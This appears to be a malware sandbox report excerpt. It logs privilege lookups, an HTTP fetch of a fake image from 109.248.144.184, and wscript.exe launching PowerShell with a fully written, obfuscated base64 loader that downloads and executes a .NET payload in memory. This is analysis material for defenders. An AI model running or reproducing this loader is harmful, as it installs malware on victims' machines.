Rm9ybQBzZXRfU2VjdXJpdHlEZXNjcmlwdG9yU2RkbEZvcm0AR2V0U2VjdXJpdHlEZXNjcmlwdG9yU2RkbEZvcm0AU2V0U2VjdXJpdHlEZXNjcmlwdG9yU2RkbEZvcm0AR2V0U2RkbEZvcm0Ac2RkbEZvcm0AR2V0U2VjdXJpdHlEZXNjcmlwdG9yQmluYXJ5Rm9ybQBTZXRTZWN1cml0eURlc2NyaXB0b3JCaW5hcnlGb3JtAEdldEJpbmFyeUZvcm0AZ2V0X0NhblJldXNlVHJhbnNmb3JtAElDcnlwdG9UcmFuc2Zvcm0AZ2V0X1BsYXRmb3JtAFBBX05vUGxhdGZvcm0AZ2V0X0lzUHJvY2Vzc29yQXJjaGl0ZWN0dXJlTm9QbGF0Zm9ybQBkZWZBc20AdGFyZ2V0QXNtAGFzbQBwYXJhbU51bQBnZXRfQ2hlY2tTdW0Ac2V0X0NoZWNrU3VtAGdldF9BZGRDaGVja1N1bQBzZXRfQWRkQ2hlY2tTdW0AV3JpdGVDaGVja1N1bQBTeXN0ZW0uRGlhZ25vc3RpY3MuU3ltYm9sU3RvcmUuSVN5bWJvbERvY3VtZW50LkdldENoZWNrU3VtAFNldENoZWNrU3VtAGNoZWNrU3VtAFJlcXVlc3RNaW5pbXVtAE5ldFNlcnZlckVudW0AZ2V0X0lzRW51bQBFbmRXcml0ZVBFQ2hlY2tzdW0AQmVnaW5Xcml0ZVBFQ2hlY2tzdW0AZ2V0X0lzSW4Ac2V0X0lzSW4AZ2V0X0lzQWRkT24Ac2V0X0lzQWRkT24AZ2V0X1J1bk9ubHlJZkxvZ2dlZE9uA
Data sent GET /xampp/vb/new_image.jpg HTTP/1.1 Host: 109.248.144.184 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 109.248.144.184
Time & API Arguments Status Return Repeated

send

 buffer: GET /xampp/vb/new_image.jpg HTTP/1.1 Host: 109.248.144.184 Connection: Keep-Alive
socket: 1420
sent: 87
1 87 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##PQ#g#Cc#d#B4#HQ#LgBy#G8#ZgBl#HI#ZQBo#G4#bwBz#Gc#bgBp#Gg#d#B0#HM#ZQBi#HQ#ZQBn#HI#bwBm#GU#cgBo#HQ#ZQBn#G8#d#Bl#HY#bwBs#GU#cgBh#Gg#cwBl#Hc#LwBv#GM#YgBr#C8#c#Bw#G0#YQB4#C8#N##4#DE#Lg#0#DQ#MQ#u#Dg#N##y#C4#OQ#w#DE#Lw#v#Do#c#B0#HQ#a##n#Ds#J#By#GU#YwBv#Gw#b#Bp#GQ#aQBu#Gc#I##9#C##J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bi#GU#YgBs#GE#cwB0#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#D##OQ#u#DI#N##4#C4#MQ#0#DQ#Lg#x#Dg#N##v#Hg#YQBt#H##c##v#HY#Yg#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#Z#Bl#HM#YwB1#HI#YQBp#G4#aQBh#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#cgBh#GI#ZQBz#HE#dQBl#GQ#I##9#C##J#Bk#GU#cwBj#HU#cgBh#Gk#bgBp#GE#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#YgBl#GI#b#Bh#HM#d##p#Ds#J#B0#Hc#ZQBy#Gs#aQBu#Gc#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#HI#YQBi#GU#cwBx#HU#ZQBk#Ck#Ow#k#H##ZQBz#GM#YQBk#Gk#d#Bv#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#D0#I##k#HQ#dwBl#HI#awBp#G4#Zw#u#Ek#bgBk#GU#e#BP#GY#K##k#H##ZQBz#GM#YQBk#Gk#d#Bv#Ck#Ow#k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#Ck#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##t#Gc#d##g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bm#G8#cgBl#GY#ZQBu#GQ#aQBu#Gc#I##r#D0#I##k#H##ZQBz#GM#YQBk#Gk#d#Bv#C4#T#Bl#G4#ZwB0#Gg#Ow#k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#I##9#C##J#Bj#HI#bwB5#Gw#cwB0#G8#bgBl#C##LQ#g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Cw#I##k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#KQ#7#CQ#cwBw#G8#cgBp#GM#aQBk#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#KQ#7#CQ#YwBv#G4#bgBp#HY#YQBu#GM#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#HM#c#Bv#HI#aQBj#Gk#Z#Bl#HM#KQ#7#CQ#cgBp#G4#ZwBi#GU#YQBy#GU#cg#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#ZQBj#G8#b#Bs#Gk#Z#Bp#G4#Zw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
parent_process wscript.exe martian_process powershell -NoProfile -Command "$Codigo = 'J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##PQ#g#Cc#d#B4#HQ#LgBy#G8#ZgBl#HI#ZQBo#G4#bwBz#Gc#bgBp#Gg#d#B0#HM#ZQBi#HQ#ZQBn#HI#bwBm#GU#cgBo#HQ#ZQBn#G8#d#Bl#HY#bwBs#GU#cgBh#Gg#cwBl#Hc#LwBv#GM#YgBr#C8#c#Bw#G0#YQB4#C8#N##4#DE#Lg#0#DQ#MQ#u#Dg#N##y#C4#OQ#w#DE#Lw#v#Do#c#B0#HQ#a##n#Ds#J#By#GU#YwBv#Gw#b#Bp#GQ#aQBu#Gc#I##9#C##J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bi#GU#YgBs#GE#cwB0#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#D##OQ#u#DI#N##4#C4#MQ#0#DQ#Lg#x#Dg#N##v#Hg#YQBt#H##c##v#HY#Yg#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#Z#Bl#HM#YwB1#HI#YQBp#G4#aQBh#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#cgBh#GI#ZQBz#HE#dQBl#GQ#I##9#C##J#Bk#GU#cwBj#HU#cgBh#Gk#bgBp#GE#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#YgBl#GI#b#Bh#HM#d##p#Ds#J#B0#Hc#ZQBy#Gs#aQBu#Gc#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#HI#YQBi#GU#cwBx#HU#ZQBk#Ck#Ow#k#H##ZQBz#GM#YQBk#Gk#d#Bv#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#D0#I##k#HQ#dwBl#HI#awBp#G4#Zw#u#Ek#bgBk#GU#e#BP#GY#K##k#H##ZQBz#GM#YQBk#Gk#d#Bv#Ck#Ow#k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#Ck#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##t#Gc#d##g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bm#G8#cgBl#GY#ZQBu#GQ#aQBu#Gc#I##r#D0#I##k#H##ZQBz#GM#YQBk#Gk#d#Bv#C4#T#Bl#G4#ZwB0#Gg#Ow#k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#I##9#C##J#Bj#HI#bwB5#Gw#cwB0#G8#bgBl#C##LQ#g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Cw#I##k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#KQ#7#CQ#cwBw#G8#cgBp#GM#aQBk#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#KQ#7#CQ#YwBv#G4#bgBp#HY#YQBu#GM#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#HM#c#Bv#HI#aQBj#Gk#Z#Bl#HM#KQ#7#CQ#cgBp#G4#ZwBi#GU#YQBy#GU#cg#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#ZQBj#G8#b#Bs#Gk#Z#Bp#G4#Zw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
option -noprofile value Does not load current user profile
option -noprofile value Does not load current user profile
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe